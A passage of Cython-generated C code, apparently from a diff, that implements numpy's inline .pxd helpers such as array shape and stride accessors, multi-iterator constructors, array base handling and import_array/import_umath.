*__pyx_v_self) { + npy_intp *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":268 + * Can return NULL for 0-dimensional arrays. + * """ + * return PyArray_DIMS(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_DIMS(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":263 + * + * @property + * cdef inline npy_intp *shape(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the dimensions/shape of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":271 + * + * @property + * cdef inline npy_intp *strides(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the strides of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_7strides_strides(PyArrayObject *__pyx_v_self) { + npy_intp *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":275 + * The number of elements matches the number of dimensions of the array (ndim). + * """ + * return PyArray_STRIDES(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_STRIDES(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":271 + * + * @property + * cdef inline npy_intp *strides(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the strides of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":278 + * + * @property + * cdef inline npy_intp size(self) nogil: # <<<<<<<<<<<<<< + * """Returns the total size (in number of elements) of the array. + * """ + */ + +static CYTHON_INLINE npy_intp __pyx_f_5numpy_7ndarray_4size_size(PyArrayObject *__pyx_v_self) { + npy_intp __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":281 + * """Returns the total size (in number of elements) of the array. + * """ + * return PyArray_SIZE(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_SIZE(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":278 + * + * @property + * cdef inline npy_intp size(self) nogil: # <<<<<<<<<<<<<< + * """Returns the total size (in number of elements) of the array. + * """ + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":284 + * + * @property + * cdef inline char* data(self) nogil: # <<<<<<<<<<<<<< + * """The pointer to the data buffer as a char*. + * This is provided for legacy reasons to avoid direct struct field access. + */ + +static CYTHON_INLINE char *__pyx_f_5numpy_7ndarray_4data_data(PyArrayObject *__pyx_v_self) { + char *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":290 + * of `PyArray_DATA()` instead, which returns a 'void*'. + * """ + * return PyArray_BYTES(self) # <<<<<<<<<<<<<< + * + * ctypedef unsigned char npy_bool + */ + __pyx_r = PyArray_BYTES(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":284 + * + * @property + * cdef inline char* data(self) nogil: # <<<<<<<<<<<<<< + * """The pointer to the data buffer as a char*. + * This is provided for legacy reasons to avoid direct struct field access. + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":776 + * ctypedef npy_cdouble complex_t + * + * cdef inline object PyArray_MultiIterNew1(a): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(1, a) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew1(PyObject *__pyx_v_a) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew1", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":777 + * + * cdef inline object PyArray_MultiIterNew1(a): + * return PyArray_MultiIterNew(1, a) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew2(a, b): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(1, ((void *)__pyx_v_a)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 777, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":776 + * ctypedef npy_cdouble complex_t + * + * cdef inline object PyArray_MultiIterNew1(a): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(1, a) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew1", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":779 + * return PyArray_MultiIterNew(1, a) + * + * cdef inline object PyArray_MultiIterNew2(a, b): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(2, a, b) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew2(PyObject *__pyx_v_a, PyObject *__pyx_v_b) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew2", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":780 + * + * cdef inline object PyArray_MultiIterNew2(a, b): + * return PyArray_MultiIterNew(2, a, b) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(2, ((void *)__pyx_v_a), ((void *)__pyx_v_b)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 780, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":779 + * return PyArray_MultiIterNew(1, a) + * + * cdef inline object PyArray_MultiIterNew2(a, b): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(2, a, b) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew2", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":782 + * return PyArray_MultiIterNew(2, a, b) + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(3, a, b, c) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew3(PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew3", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":783 + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): + * return PyArray_MultiIterNew(3, a, b, c) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(3, ((void *)__pyx_v_a), ((void *)__pyx_v_b), ((void *)__pyx_v_c)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 783, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":782 + * return PyArray_MultiIterNew(2, a, b) + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(3, a, b, c) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew3", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":785 + * return PyArray_MultiIterNew(3, a, b, c) + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(4, a, b, c, d) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew4(PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew4", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":786 + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): + * return PyArray_MultiIterNew(4, a, b, c, d) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(4, ((void *)__pyx_v_a), ((void *)__pyx_v_b), ((void *)__pyx_v_c), ((void *)__pyx_v_d)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 786, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":785 + * return PyArray_MultiIterNew(3, a, b, c) + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(4, a, b, c, d) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew4", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":788 + * return PyArray_MultiIterNew(4, a, b, c, d) + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew5(PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d, PyObject *__pyx_v_e) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew5", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":789 + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): + * return PyArray_MultiIterNew(5, a, b, c, d, e) # <<<<<<<<<<<<<< + * + * cdef inline tuple PyDataType_SHAPE(dtype d): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(5, ((void *)__pyx_v_a), ((void *)__pyx_v_b), ((void *)__pyx_v_c), ((void *)__pyx_v_d), ((void *)__pyx_v_e)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 789, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":788 + * return PyArray_MultiIterNew(4, a, b, c, d) + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew5", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":791 + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + * cdef inline tuple PyDataType_SHAPE(dtype d): # <<<<<<<<<<<<<< + * if PyDataType_HASSUBARRAY(d): + * return d.subarray.shape + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyDataType_SHAPE(PyArray_Descr *__pyx_v_d) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("PyDataType_SHAPE", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":792 + * + * cdef inline tuple PyDataType_SHAPE(dtype d): + * if PyDataType_HASSUBARRAY(d): # <<<<<<<<<<<<<< + * return d.subarray.shape + * else: + */ + __pyx_t_1 = PyDataType_HASSUBARRAY(__pyx_v_d); + if (__pyx_t_1) { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":793 + * cdef inline tuple PyDataType_SHAPE(dtype d): + * if PyDataType_HASSUBARRAY(d): + * return d.subarray.shape # <<<<<<<<<<<<<< + * else: + * return () + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(((PyObject*)__pyx_v_d->subarray->shape)); + __pyx_r = ((PyObject*)__pyx_v_d->subarray->shape); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":792 + * + * cdef inline tuple PyDataType_SHAPE(dtype d): + * if PyDataType_HASSUBARRAY(d): # <<<<<<<<<<<<<< + * return d.subarray.shape + * else: + */ + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":795 + * return d.subarray.shape + * else: + * return () # <<<<<<<<<<<<<< + * + * + */ + /*else*/ { + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_empty_tuple); + __pyx_r = __pyx_empty_tuple; + goto __pyx_L0; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":791 + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + * cdef inline tuple PyDataType_SHAPE(dtype d): # <<<<<<<<<<<<<< + * if PyDataType_HASSUBARRAY(d): + * return d.subarray.shape + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":970 + * int _import_umath() except -1 + * + * cdef inline void set_array_base(ndarray arr, object base): # <<<<<<<<<<<<<< + * Py_INCREF(base) # important to do this before stealing the reference below! + * PyArray_SetBaseObject(arr, base) + */ + +static CYTHON_INLINE void __pyx_f_5numpy_set_array_base(PyArrayObject *__pyx_v_arr, PyObject *__pyx_v_base) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("set_array_base", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":971 + * + * cdef inline void set_array_base(ndarray arr, object base): + * Py_INCREF(base) # important to do this before stealing the reference below! # <<<<<<<<<<<<<< + * PyArray_SetBaseObject(arr, base) + * + */ + Py_INCREF(__pyx_v_base); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":972 + * cdef inline void set_array_base(ndarray arr, object base): + * Py_INCREF(base) # important to do this before stealing the reference below! + * PyArray_SetBaseObject(arr, base) # <<<<<<<<<<<<<< + * + * cdef inline object get_array_base(ndarray arr): + */ + (void)(PyArray_SetBaseObject(__pyx_v_arr, __pyx_v_base)); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":970 + * int _import_umath() except -1 + * + * cdef inline void set_array_base(ndarray arr, object base): # <<<<<<<<<<<<<< + * Py_INCREF(base) # important to do this before stealing the reference below! + * PyArray_SetBaseObject(arr, base) + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":974 + * PyArray_SetBaseObject(arr, base) + * + * cdef inline object get_array_base(ndarray arr): # <<<<<<<<<<<<<< + * base = PyArray_BASE(arr) + * if base is NULL: + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_get_array_base(PyArrayObject *__pyx_v_arr) { + PyObject *__pyx_v_base; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("get_array_base", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":975 + * + * cdef inline object get_array_base(ndarray arr): + * base = PyArray_BASE(arr) # <<<<<<<<<<<<<< + * if base is NULL: + * return None + */ + __pyx_v_base = PyArray_BASE(__pyx_v_arr); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":976 + * cdef inline object get_array_base(ndarray arr): + * base = PyArray_BASE(arr) + * if base is NULL: # <<<<<<<<<<<<<< + * return None + * return base + */ + __pyx_t_1 = (__pyx_v_base == NULL); + if (__pyx_t_1) { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":977 + * base = PyArray_BASE(arr) + * if base is NULL: + * return None # <<<<<<<<<<<<<< + * return base + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":976 + * cdef inline object get_array_base(ndarray arr): + * base = PyArray_BASE(arr) + * if base is NULL: # <<<<<<<<<<<<<< + * return None + * return base + */ + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":978 + * if base is NULL: + * return None + * return base # <<<<<<<<<<<<<< + * + * # Versions of the import_* functions which are more suitable for + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(((PyObject *)__pyx_v_base)); + __pyx_r = ((PyObject *)__pyx_v_base); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":974 + * PyArray_SetBaseObject(arr, base) + * + * cdef inline object get_array_base(ndarray arr): # <<<<<<<<<<<<<< + * base = PyArray_BASE(arr) + * if base is NULL: + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":982 + * # Versions of the import_* functions which are more suitable for + * # Cython code. + * cdef inline int import_array() except -1: # <<<<<<<<<<<<<< + * try: + * __pyx_import_array() + */ + +static CYTHON_INLINE int __pyx_f_5numpy_import_array(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("import_array", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":983 + * # Cython code. + * cdef inline int import_array() except -1: + * try: # <<<<<<<<<<<<<< + * __pyx_import_array() + * except Exception: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":984 + * cdef inline int import_array() except -1: + * try: + * __pyx_import_array() # <<<<<<<<<<<<<< + * except Exception: + * raise ImportError("numpy.core.multiarray failed to import") + */ + __pyx_t_4 = _import_array(); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(2, 984, __pyx_L3_error) + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":983 + * # Cython code. + * cdef inline int import_array() except -1: + * try: # <<<<<<<<<<<<<< + * __pyx_import_array() + * except Exception: + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L8_try_end; + __pyx_L3_error:; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":985 + * try: + * __pyx_import_array() + * except Exception: # <<<<<<<<<<<<<< + * raise ImportError("numpy.core.multiarray failed to import") + * + */ + __pyx_t_4 = __Pyx_PyErr_ExceptionMatches(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0]))); + if (__pyx_t_4) { + __Pyx_AddTraceback("numpy.import_array", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_6, &__pyx_t_7) < 0) __PYX_ERR(2, 985, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_7); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":986 + * __pyx_import_array() + * except Exception: + * raise ImportError("numpy.core.multiarray failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_umath() except -1: + */ + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ImportError, __pyx_tuple__9, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(2, 986, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_Raise(__pyx_t_8, 0, 0, 0); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __PYX_ERR(2, 986, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":983 + * # Cython code. + * cdef inline int import_array() except -1: + * try: # <<<<<<<<<<<<<< + * __pyx_import_array() + * except Exception: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + goto __pyx_L1_error; + __pyx_L8_try_end:; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":982 + * # Versions of the import_* functions which are more suitable for + * # Cython code. + * cdef inline int import_array() except -1: # <<<<<<<<<<<<<< + * try: + * __pyx_import_array() + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("numpy.import_array", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":988 + * raise ImportError("numpy.core.multiarray failed to import") + * + * cdef inline int import_umath() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + +static CYTHON_INLINE int __pyx_f_5numpy_import_umath(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("import_umath", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":989 + * + * cdef inline int import_umath() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":990 + * cdef inline int import_umath() except -1: + * try: + * _import_umath() # <<<<<<<<<<<<<< + * except Exception: + * raise ImportError("numpy.core.umath failed to import") + */ + __pyx_t_4 = _import_umath(); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(2, 990, __pyx_L3_error) + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":989 + * + * cdef inline int import_umath() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L8_try_end; + __pyx_L3_error:; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":991 + * try: + * _import_umath() + * except Exception: # <<<<<<<<<<<<<< + * raise ImportError("numpy.core.umath failed to import") + * + */ + __pyx_t_4 = __Pyx_PyErr_ExceptionMatches(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0]))); + if (__pyx_t_4) { + __Pyx_AddTraceback("numpy.import_umath", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_6, &__pyx_t_7) < 0) __PYX_ERR(2, 991, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_7); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":992 + * _import_umath() + * except Exception: + * raise ImportError("numpy.core.umath failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_ufunc() except -1: + */ + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ImportError, 